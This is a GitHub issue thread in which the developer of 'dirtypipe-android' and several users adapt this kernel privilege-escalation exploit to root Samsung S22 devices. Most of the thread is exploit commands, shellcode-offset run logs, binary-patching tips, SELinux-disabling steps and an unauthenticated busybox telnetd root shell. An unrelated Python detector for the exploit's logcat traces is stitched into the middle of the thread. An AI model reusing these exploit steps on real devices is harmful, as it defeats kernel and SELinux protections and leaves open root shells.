vendor/lib/libmaskdetection.uniplugin@1.0.so
vendor/lib/libmcs.so
vendor/lib/libmctfengine_stub.so
vendor/lib/libmdmdetect.so
vendor/lib/libmdsprpc.so
vendor/lib/libmfGhostDetection.so
vendor/lib/libminkdescriptor.so
vendor/lib/libminksocket_vendor.so
vendor/lib/libmm-hdcpmgr.so
vendor/lib/libmm-omxcore.so
vendor/lib/libmmcamera_bestats.so
00001000: 5f75 0043 636c 616d 7036 345f 7300 4363  _u.Cclamp64_s.Cc
vendor/lib/libmmcamera_cac3.so
vendor/lib/libmmcamera_lscv35.so
vendor/lib/libmmcamera_mfnr.so
vendor/lib/libmmcamera_mfnr_t4.so
vendor/lib/libmmcamera_pdpc.so
vendor/lib/libmpbase.so
vendor/lib/libmulticam_image_optical_zoom.so
vendor/lib/libmulticam_optical_zoom_control.so
vendor/lib/libmulticam_video_optical_zoom.so
vendor/lib/libmultiobject_tracker.so
vendor/lib/libnative-api.so
vendor/lib/libnbaio_mono.so
vendor/lib/libnetmgr.so
vendor/lib/libnetmgr_common.so
vendor/lib/libnetmgr_utils.so
vendor/lib/libnetmgrxfrmutils.so
vendor/lib/liboemaids_vendor.so
vendor/lib/liboemcrypto.so
vendor/lib/libopencv.so
vendor/lib/libopencv3a.so
vendor/lib/libopenvx.so
vendor/lib/libopestriping.so
00001000: 5f6d 696e 696d 616c 005f 5f75 6273 616e  _minimal.__ubsan
vendor/lib/libops.so
vendor/lib/libopus.so
vendor/lib/libos.so
vendor/lib/libpa.so
vendor/lib/libpadm.so
vendor/lib/libpalclient.so
vendor/lib/libpantilt_detector.uniplugin@1.0.so
vendor/lib/libpassese.so
vendor/lib/libpdmapper.so
vendor/lib/libpdnotifier.so
vendor/lib/libperfconfig.so
00001000: 5f5a 4e31 3950 6572 6643 6f6e 6669 6744  _ZN19PerfConfigD
vendor/lib/libperfgluelayer.so
vendor/lib/libperfioctl.so
vendor/lib/libperipheral_client.so
vendor/lib/libpersonalimprinting.uniplugin@1.0.so
vendor/lib/libpet_detector.uniplugin@1.0.so
vendor/lib/libplatformconfig.so
vendor/lib/libpredeflicker_native.so
vendor/lib/libprofileparamstorage.so
vendor/lib/libprotobuf-cpp-full-3.9.1.so
vendor/lib/libprotobuf-cpp-lite-3.9.1.so
vendor/lib/libpsi.so
vendor/lib/libq3dtools_adreno.so
vendor/lib/libqc2audio_base.so
vendor/lib/libqc2audio_basecodec.so
vendor/lib/libqc2audio_core.so
vendor/lib/libqc2audio_hooks.so
vendor/lib/libqc2audio_hwaudiocodec.so
vendor/lib/libqc2audio_platform.so
vendor/lib/libqc2audio_swaudiocodec.so
vendor/lib/libqc2audio_utils.so
vendor/lib/libqc2colorconvertfilter.so
vendor/lib/libqc2filter.so
vendor/lib/libqc2imageformatfilter.so
vendor/lib/libqcbor.so
vendor/lib/libqcc_file_agent.so
00001000: 5f62 6173 6963 5f73 7472 696e 675f 636f  _basic_string_co
vendor/lib/libqcci_legacy.so
vendor/lib/libqcmaputils.so
vendor/lib/libqcodec2_base.so
vendor/lib/libqcodec2_basecodec.so
vendor/lib/libqcodec2_core.so
vendor/lib/libqcodec2_filterbase.so
vendor/lib/libqcodec2_hooks.so
vendor/lib/libqcodec2_mockfilter.so
vendor/lib/libqcodec2_mockqc2filter.so
vendor/lib/libqcodec2_platform.so
vendor/lib/libqcodec2_utils.so
vendor/lib/libqcodec2_v4l2codec.so
vendor/lib/libqdMetaData.so
vendor/lib/libqdcm-algo.so
00001000: 5f5f 7661 6c75 655f 7479 7065 494e 3471  __value_typeIN4q
vendor/lib/libqdcm-json-mode-parser.so
vendor/lib/libqdcm-mode-parser.so
vendor/lib/libqdi.so
vendor/lib/libqdma_file_agent.so
00001000: 5f62 6173 6963 5f73 7472 696e 675f 636f  _basic_string_co
vendor/lib/libqdp.so
vendor/lib/libqdpr.so
vendor/lib/libqdutils.so
vendor/lib/libqfp_sensortest.so
vendor/lib/libqisl.so
vendor/lib/libqll.so
vendor/lib/libqll10.so
vendor/lib/libqllengine.so
vendor/lib/libqmi.so
vendor/lib/libqmi_cci.so
vendor/lib/libqmi_client_helper.so
vendor/lib/libqmi_client_qmux.so
vendor/lib/libqmi_common_so.so
vendor/lib/libqmi_csi.so
vendor/lib/libqmi_csvt_srvc.so
vendor/lib/libqmi_encdec.so
vendor/lib/libqmi_legacy.so
vendor/lib/libqmiservices.so
vendor/lib/libqmiservices_ext.so
vendor/lib/libqrtr.so
vendor/lib/libqrtrclient.so
vendor/lib/libqseed3.so
vendor/lib/libqservice.so
vendor/lib/libqshcamera.so
vendor/lib/libqsocket.so
vendor/lib/libqti-iopd-client.so
vendor/lib/libqti-iopd.so
vendor/lib/libqti-perfd-client.so
vendor/lib/libqti-perfd.so
vendor/lib/libqti-util.so
vendor/lib/libqti-utils.so
vendor/lib/libqti_vndfwk_detect.so
vendor/lib/libqti_vndfwk_detect_vendor.so
vendor/lib/libqtigefar.so
vendor/lib/librapidscorer.so
vendor/lib/librcmask.so
vendor/lib/librechdr10plus.sec.so
vendor/lib/librechdr10plus.so
vendor/lib/librecordalive.so
vendor/lib/librmengine.uniplugin@1.0.so
vendor/lib/librmnetctl.so
vendor/lib/librpmb.so
vendor/lib/libsaped.so
vendor/lib/libsavsac.so
vendor/lib/libsavscmn.so
vendor/lib/libsavsvc.so
vendor/lib/libscaler_hw.unifunc.so
vendor/lib/libscaler_sw.unifunc.so
vendor/lib/libscenedetector.uniplugin@1.0.so
vendor/lib/libscveCommon.so
00001000: 5f74 696d 6564 7761 6974 0070 7468 7265  _timedwait.pthre
vendor/lib/libscveCommon_stub.so
vendor/lib/libscveObjectSegmentation.so
vendor/lib/libscveObjectSegmentation_stub.so
vendor/lib/libscveObjectTracker.so
vendor/lib/libscveObjectTracker_stub.so
vendor/lib/libsdedrm.so
vendor/lib/libsdm-color.so
vendor/lib/libsdm-colormgr-algo.so
vendor/lib/libsdm-disp-vndapis.so
vendor/lib/libsdmcore.so
vendor/lib/libsdmextension.so
vendor/lib/libsdmutils.so
vendor/lib/libsdsprpc.so
vendor/lib/libsdynatm.so
vendor/lib/libsec_semRil.so
vendor/lib/libsecaudiocoreutils.so
vendor/lib/libsecaudioinfo.so
vendor/lib/libsecfr_engine.so
vendor/lib/libsecfr_model.so
vendor/lib/libsecnativefeature.so
vendor/lib/libsecril-client.so
vendor/lib/libsecure_storage.so
vendor/lib/libsecureui_svcsock.so
vendor/lib/libsegmentationeffect.uniplugin@1.0.so
vendor/lib/libsegmentationeffect_capture.uniplugin@1.0.so
vendor/lib/libsehbluetooth_audio_session.so
vendor/lib/libsemnativecarrierfeature.so
vendor/lib/libsensorlistener.so
vendor/lib/libsensorndkbridge.so
vendor/lib/libsensorslog.so
vendor/lib/libsevrc.so
vendor/lib/libsfeShiftExtrapolation.so
vendor/lib/libsfplugin_ccodec_utils.so
vendor/lib/libshmemcompat.so
vendor/lib/libshmemutil.so
vendor/lib/libshotsuggestion.so
vendor/lib/libshotsuggestion_engines.so
vendor/lib/libsi.so
vendor/lib/libsmartfocus.uniplugin@1.0.so
vendor/lib/libsmemlog.so
vendor/lib/libsn100u_fw.so
vendor/lib/libsn220u_fw.so
vendor/lib/libsnaace.so
vendor/lib/libsnamrnb.so
vendor/lib/libsnamrwb.so
vendor/lib/libsnapdragoncolor-manager.so
vendor/lib/libsnapdragoncolor-qdcm.so
vendor/lib/libsndcardparser.so
vendor/lib/libsns_device_mode_stub.so
vendor/lib/libsns_direct_channel_stub.so
vendor/lib/libsns_registry_skel.so
vendor/lib/libsnsapi.so
vendor/lib/libsnsdiaglog.so
vendor/lib/libsoc_helper.so
vendor/lib/libsoc_helper_jni.so
vendor/lib/libsocial_image_enhancement.uniplugin@1.0.so
vendor/lib/libspcom.so
vendor/lib/libspeakercalibration.so
vendor/lib/libspictrl.so
vendor/lib/libspl.so
vendor/lib/libsqcp.so
00001000: 5f73 6600 7371 6370 5f74 626c 5f76 715f  _sf.sqcp_tbl_vq_
vendor/lib/libtfestriping.so
00001000: 5f75 6273 616e 5f68 616e 646c 655f 6e75  _ubsan_handle_nu
vendor/lib/unihal_uniplugin@1.0.so
00001000: 5f6c 696e 6b00 6765 745f 706c 7567 696e  _link.get_plugin
elliwigy commented 2 years ago

> Hey elliwigy how are you doing, ok I will check as you instructed above. I do see that libstagefright_soft_mp3dec.so on s22 doesn't seem to exist; there are other libstagefright libs there, however I have not yet checked the offset. I will do so later today or tomorrow.

It does exist on s22 ultra (SM-S908U) which is what I posted above in /vendor/lib.. not sure why the S22 would be any different?

polygraphene commented 2 years ago

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.

According to your output, we can choose lib for overwrite. The following libraries are the best because they are not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

elliwigy commented 2 years ago

> You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.
>
> According to your output, we can choose lib for overwrite. The following libraries are the best because they are not so frequently used (I think).
>
> vendor/lib/libcamxifestriping.so
> 00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
> vendor/lib/libimage_enhancement.arcsoft.so
> 00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p
>
> Download 1.0.2 from release page, then edit run.bat to append arguments like:
>
> %adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so
>
> Then launch run.bat and check adb logcat.

I will try this tonight and report back with logcat..

Just out of curiosity, why do you say you cannot run it on the device when the output I provided is from the device? lol

In normal adb shell running as normal shell you cannot view vendor/lib as you get permission denied but if you run as "vendor_shell" you can view the vendor/lib files just fine and can run your commands you posted earlier as I did when sharing the output..

You can try it yourself.. from a regular terminal you simply type:

adb shell /vendor/bin/sh

Then type:

id

and your output should show you are running as vendor_shell where you can then view vendor/lib directory no problem and without having to download firmware, unsparse super.img, lpunpack super.img and mount vendor which is a lot more work and space used lol.. just saying :-)

oakieville commented 2 years ago

run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 2.7 MB/s (44688 bytes in 0.016s)
startup-root: 1 file pushed, 0 skipped. 0.1 MB/s (3671 bytes in 0.028s)
magisk/busybox: 1 file pushed, 0 skipped. 66.9 MB/s (2102536 bytes in 0.030s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 111.1 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 0.7 MB/s (2823823 bytes in 3.877s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys
Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260
Empty space size: 2096 bytes
Run index: 0
Shell code size: 308 0x134 bytes
open failed: No such file or directory

logcat is here

http://oakieville.com/logcat.txt

oakieville commented 2 years ago

seems it can't access vendor/lib/* files

Dog10dogg commented 2 years ago

The reason I believe it says the file is not found is because the file "/system/lib/libldacBT_enc.so" does not exist on the Samsungs.

My workaround was (instead of compiling):
Opened the release file "dirtypipe-android" in HxD.
Changed both places that contained "/system/lib/libldacBT_enc.so" with "/////system/lib/random.so" (the first "/" and the ".so" have to line up, but you can have as many beginning "/" as you need to null out extra letters in the path name).
Periods before and after the path name are hex "00" and not actually periods.

It'll run but crashes my device almost immediately. It does work tho, as I can use it to copy normally unreadable files and copy them to sdcard. I believe it is either Knox or the module needs to be tailored to Samsung's kernel. I would attach the log but it crashes without any log output on adb. Also the libs between s908u and s908u1 are different. Only two of the possibilities were the same for me. I used several vendor libs but mostly picked this one, /vendor/lib/libcamxifestriping.so, due to it being the same across both models.

I can use the vendor shell to look at the modules on vendor_dklh/lib/modules (I think?). I did see a file called something like "policy config.ko" but it doesn't look like it lines up with the "mymod.ko". That may be irrelevant tho.

oakieville commented 2 years ago

/system/lib/libldacBT_enc.so isn't what it was calling. If you look at the code, it prints "Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so" from the same variable it loads the lib from. I believe, as elliwigy explained, it requires being /vendor/bin/sh to access those libs correctly.

lib/libextmediaformatdef.so
00001000: 5f63 726f 7000 6369 7479 2d69 6400 7472  _crop.city-id.tr

maybe this?

Dog10dogg commented 2 years ago

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

elliwigy commented 2 years ago

> The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.
>
> The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.
>
> Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

S22 Ultra does have it:

/system/lib64/libldacBT_enc.so

Of course its in lib64 not lib dir..

elliwigy commented 2 years ago

> The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.
>
> The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.
>
> Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

so maybe edit it to use the same so file but in lib64

polygraphene commented 2 years ago

> > You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu. According to your output, we can choose lib for overwrite. The following libraries are the best because they are not so frequently used (I think).
> >
> > vendor/lib/libcamxifestriping.so
> > 00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
> > vendor/lib/libimage_enhancement.arcsoft.so
> > 00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p
> >
> > Download 1.0.2 from release page, then edit run.bat to append arguments like:
> >
> > %adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so
> >
> > Then launch run.bat and check adb logcat.
>
> I will try this tonight and report back with logcat..
>
> Just out of curiosity, why do you say you cannot run it on the device when the output I provided is from the device? lol
>
> In normal adb shell running as normal shell you cannot view vendor/lib as you get permission denied but if you run as "vendor_shell" you can view the vendor/lib files just fine and can run your commands you posted earlier as I did when sharing the output..
>
> You can try it yourself.. from a regular terminal you simply type:
>
> adb shell /vendor/bin/sh
>
> Then type:
>
> id
>
> and your output should show you are running as vendor_shell where you can then view vendor/lib directory no problem and without having to download firmware, unsparse super.img, lpunpack super.img and mount vendor which is a lot more work and space used lol.. just saying :-)

That's absolutely right. My bad. It was unnecessary to extract firmware. Thanks!

polygraphene commented 2 years ago

> run.bat
> dirtypipe-android: 1 file pushed, 0 skipped. 2.7 MB/s (44688 bytes in 0.016s)
> startup-root: 1 file pushed, 0 skipped. 0.1 MB/s (3671 bytes in 0.028s)
> magisk/busybox: 1 file pushed, 0 skipped. 66.9 MB/s (2102536 bytes in 0.030s)
> magisk/magiskpolicy: 1 file pushed, 0 skipped. 111.1 MB/s (672928 bytes in 0.006s)
> 4 files pushed, 0 skipped. 0.7 MB/s (2823823 bytes in 3.877s)
> Ignore device info.
> Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys
> Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so
> Offset found: shellcode_offset: a57d0 hook_offset: 5b260
> Empty space size: 2096 bytes
> Run index: 0
> Shell code size: 308 0x134 bytes
> open failed: No such file or directory
>
> logcat is here
>
> http://oakieville.com/logcat.txt

There doesn't seem to be "/system/lib/libldacBT_enc.so" as @Dog10dogg said. Actually "libldacBT_enc.so" can be any file which is not so frequently used by system. You can choose 64bit "/system/lib64/libldacBT_enc.so". I will add option to change this lib.

stage2_lib (/system/lib/libldacBT_enc.so) and stage2_param_libname (/vendor/lib/libstagefright_soft_mp3dec.so in Pixel 6) are confusing names, but have different roles. dirtypipe-android (shell process) overwrites stage2_lib to send code to be executed in init process. Then init process overwrites stage2_param_libname so that it has the content of mymod.ko.

polygraphene commented 2 years ago

> I would attach the log but it crashes without any log output on adb.

So we should investigate what is causing this crash. I will upload debug version later.

oakieville commented 2 years ago

Also if I change that to a lib in system lib in the command it doesn't say file not found, or at least didn't when I tried it

polygraphene commented 2 years ago

dirtypipe-android-1.0.3-debug1.zip

Try this version. This version should output logcat like following if stage1 has run successfully:

$ adb shell
oriole:/ $ logcat | grep libc
03-29 21:47:19.811 24886   375 F libc    : Fatal signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x7fad3d4001 in tid 24886 (init), pid 24886 (init)

In addition to logcat, paste output of run.bat here.

If it still reboots, there is something wrong in stage1.

Even if the device doesn't reboot, please manually reboot after launching run.bat, because it won't automatically restore file content. Reboot is required to restore original files.

polygraphene commented 2 years ago

dirtypipe-android-1.0.3-debug2.zip

Try second version if you got "libc : Fatal signal ..." in logcat. It will generate empty file on /dev/.s2a if stage2 was successfully called.

Run adb shell ls /dev/.s2a to check if file exists. When file exists, it says "Permission denied":

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: Permission denied

When not exists (failed to call stage2), it says "No such file or directory" (or reboot):

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: No such file or directory
polygraphene commented 2 years ago

dirtypipe-android-1.0.3-debug3.zip

Try third version if you got "Permission denied".

It will produce following logcat if modprobe was successfully launched:

$ adb shell
oriole:/ $ logcat | grep modprobe
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:76): avc: denied { read } for path="/dev/.dirtypipe-0005" dev="tmpfs" ino=1166 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:77): avc: denied { read } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:78): avc: denied { write } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.331  3278  3278 I modprobe-payload: Parsed lib_mod: /vendor/lib/libstagefright_soft_mp3dec.so
03-29 22:25:08.331  3278  3278 I modprobe-payload: Content: 5f 24 03 d5 a8 88 84 d2

If it failed, it might reboot or not output any log.

polygraphene commented 2 years ago

dirtypipe-android-1.0.3-beta.zip

Try this version if you succeeded to run debug1-3. If this version still reboots the device, there is something wrong with the kernel module.

elliwigy commented 2 years ago

> dirtypipe-android-1.0.3-debug2.zip
>
> Try second version if you got "libc : Fatal signal ..." in logcat. It will generate empty file on /dev/.s2a if stage2 was successfully called.
>
> Run adb shell ls /dev/.s2a to check if file exists. When file exists, it says "Permission denied":
>
> $ adb shell ls /dev/.s2a
> ls: /dev/.s2a: Permission denied
>
> When not exists (failed to call stage2), it says "No such file or directory" (or reboot):
>
> $ adb shell ls /dev/.s2a
> ls: /dev/.s2a: No such file or directory

Output of run.bat

dirtypipe-android: 1 file pushed, 0 skipped. 0.2 MB/s (45168 bytes in 0.186s)
startup-root: 1 file pushed, 0 skipped. 0.6 MB/s (3671 bytes in 0.006s)
magisk/busybox: 1 file pushed, 0 skipped. 85.1 MB/s (2102536 bytes in 0.024s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 58.6 MB/s (672928 bytes in 0.011s)
4 files pushed, 0 skipped. 8.5 MB/s (2824303 bytes in 0.318s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f
Empty space size: 2096 bytes
Run index: 8
Stage1 debug filename: /dev/.dirtypipe-0008
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .

Logcat

It crashes before can check the /dev exists.. It does a kernel panic.

elliwigy commented 2 years ago

> dirtypipe-android-1.0.3-beta.zip
>
> Try this version if you succeeded to run debug1-3. If this version still reboots the device, there is something wrong with the kernel module.

Yep, kernel panic/crash on my S22 Ultra

elliwigy commented 2 years ago

> dirtypipe-android-1.0.3-beta.zip
>
> Try this version if you succeeded to run debug1-3. If this version still reboots the device, there is something wrong with the kernel module.

I am downloading SM-S908U kernel source code now

polygraphene commented 2 years ago

You missed debug1. But I found the problem in your log on debug2.

first instruction has an unexpected value. It means different compiler option was used for S22.

Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f

Can you upload /system/lib64/libc++.so?

elliwigy commented 2 years ago

> You missed debug1. But I found the problem in your log on debug2.
>
> first instruction has an unexpected value. It means different compiler option was used for S22.
>
> Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f
>
> Can you upload /system/lib64/libc++.so?

Sure...

/system/lib64/libc++.so

polygraphene commented 2 years ago

dirtypipe-android-1.0.3-beta2.zip

Thank you! Try this version and post output of run.bat.

elliwigy commented 2 years ago

> dirtypipe-android-1.0.3-beta2.zip
>
> Thank you! Try this version and post output of run.bat.

dirtypipe-android: 1 file pushed, 0 skipped. 4.2 MB/s (45296 bytes in 0.010s)
startup-root: 1 file pushed, 0 skipped. 3.7 MB/s (3671 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 68.7 MB/s (2102536 bytes in 0.029s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 59.2 MB/s (672928 bytes in 0.011s)
4 files pushed, 0 skipped. 35.3 MB/s (2824431 bytes in 0.076s)
Failed to set property 'a' to 'a'. See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 0
Stage1 debug filename: /dev/.dirtypipe-0000
Shell code size: 344 0x158 bytes
It worked!

polygraphene commented 2 years ago

Did the device reboot? How about adb logcat?

elliwigy commented 2 years ago

second time I ran it it said press any key to continue then crashed but first time through didn't say press any key to continue but didn't crash either

polygraphene commented 2 years ago

That seems a good sign. Run adb shell, then logcat -d | grep modprobe and logcat -d | grep libc

elliwigy commented 2 years ago

logcat.txt logcat2.txt

polygraphene commented 2 years ago

Seems succeeded. Didn't you get root shell?

03-29 07:47:12.947  5656  5656 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:265): avc:  denied  { search } for  pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:266): avc:  denied  { execute } for  pid=5658 comm="modprobe" name="startup-root"dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:267): avc:  denied  { read open } for  pid=5658 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
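
The logcat excerpts posted in this thread are also what a defender would look for on a device. The Python below is an added example, not code from the project or from anyone in the thread: it parses logcat lines and flags the traces those excerpts show. The rule names are labels chosen for this example, and the last two sample lines are constructed.

```python
import re

# Lines 1-4 are copied from the logcat excerpts in this thread; lines 5-6 are
# constructed benign entries added for contrast.
SAMPLE_LOGCAT = r'''
03-29 21:47:19.811 24886   375 F libc    : Fatal signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x7fad3d4001 in tid 24886 (init), pid 24886 (init)
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:76): avc: denied { read } for path="/dev/.dirtypipe-0005" dev="tmpfs" ino=1166 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=0
03-29 22:25:08.331  3278  3278 I modprobe-payload: Parsed lib_mod: /vendor/lib/libstagefright_soft_mp3dec.so
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:266): avc:  denied  { execute } for  pid=5658 comm="modprobe" name="startup-root"dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 22:26:00.000  1207  1207 E audit   : type=1400 audit(0.0:90): avc: denied { read } for name="stats" dev="proc" ino=4026 scontext=u:r:untrusted_app:s0:c1,c2 tcontext=u:object_r:proc_stat:s0 tclass=file permissive=0
03-29 22:26:01.000  1500  1500 I ActivityManager: Start proc 4021:com.example.app/u0a123
'''.strip().splitlines()

AVC_RE = re.compile(r'avc:\s+denied\s+\{\s*([^}]*?)\s*\}')
# key=value pairs; values may be quoted and, as in the thread's log, may run
# straight into the next key with no separating space.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
FATAL_RE = re.compile(r'\bF libc\s*: Fatal signal \d+ \((\w+)\).*\bpid \d+ \(([^)]+)\)')
PAYLOAD_TAG_RE = re.compile(r'\bmodprobe-payload\s*:')
# File name pattern printed by the debug builds in this thread
# ("Stage1 debug filename: /dev/.dirtypipe-0008").
STAGING_RE = re.compile(r'^/dev/\.dirtypipe-\d+$')


def parse_avc(line):
    """Return the fields of an SELinux 'avc: denied' record, or None."""
    m = AVC_RE.search(line)
    if not m:
        return None
    fields = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    fields['perms'] = m.group(1).split()
    return fields


def classify(line):
    """Return the list of rule labels that a single logcat line triggers."""
    findings = []
    m = FATAL_RE.search(line)
    if m and m.group(2) == 'init':
        # A process named init dying on a fatal signal is never routine.
        findings.append('init-fatal-signal')
    if PAYLOAD_TAG_RE.search(line):
        findings.append('payload-log-tag')
    avc = parse_avc(line)
    if avc:
        src = avc.get('scontext', '')
        tgt = avc.get('tcontext', '')
        if STAGING_RE.match(avc.get('path', '')):
            findings.append('staging-file-access')
        if ':vendor_modprobe:' in src and ':shell_data_file:' in tgt:
            # modprobe has no business with adb-shell-owned files.
            findings.append('modprobe-touches-shell-data')
        if avc.get('permissive') == '1':
            # The denial was logged but not enforced: the domain (or the
            # whole device) is permissive, unexpected on a release build.
            findings.append('denial-not-enforced')
    return findings


def scan(lines):
    """Return (1-based line number, labels) for every line with a finding."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        labels = classify(line)
        if labels:
            hits.append((lineno, labels))
    return hits


if __name__ == '__main__':
    for lineno, labels in scan(SAMPLE_LOGCAT):
        print(lineno, ', '.join(labels))
```
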
elliwigy commented 2 years ago

Nope, unless I am doing something wrong.. I double click the run.bat and it runs up to saying "It worked!" then just sits there.. then if I run it a second time it crashes.

elliwigy commented 2 years ago

This time I ran it the first time said it worked then pressed enter and it said press any key to continue then AUTH but the terminal just closed and nothing happened.

polygraphene commented 2 years ago

So, add following 3 lines in startup-root then retry:

HOST=127.0.0.1
PORT=10847

logwrapper echo startup-root ok
logwrapper id
/data/local/tmp/busybox telnetd -l /bin/sh -p 10848 &

export ANDROID_DATA=/data
export ANDROID_ART_ROOT=/apex/com.android.art

Then try /data/local/tmp/busybox telnet 127.0.0.1 10848 on adb shell. And upload logcat again.

elliwigy commented 2 years ago

logcat3.txt

elliwigy commented 2 years ago

I added the 3 lines and ran the run.bat then adb shell and the telnet command keeps returning connection refused

polygraphene commented 2 years ago

Did you launch run.bat after editing startup-root?

elliwigy commented 2 years ago

> Did you launch run.bat after editing startup-root?

Yes lol

elliwigy commented 2 years ago

startup-root.txt

did I edit it right? just remove the .txt file extension

polygraphene commented 2 years ago

Yes. That's right. I could not find any clue on logcat3.txt. Can you reboot the device and retry?

polygraphene commented 2 years ago

dirtypipe-android-1.0.3-beta3.zip

I added more log and setenforce 0 on startup-root. Try it. You don't need to edit startup-root.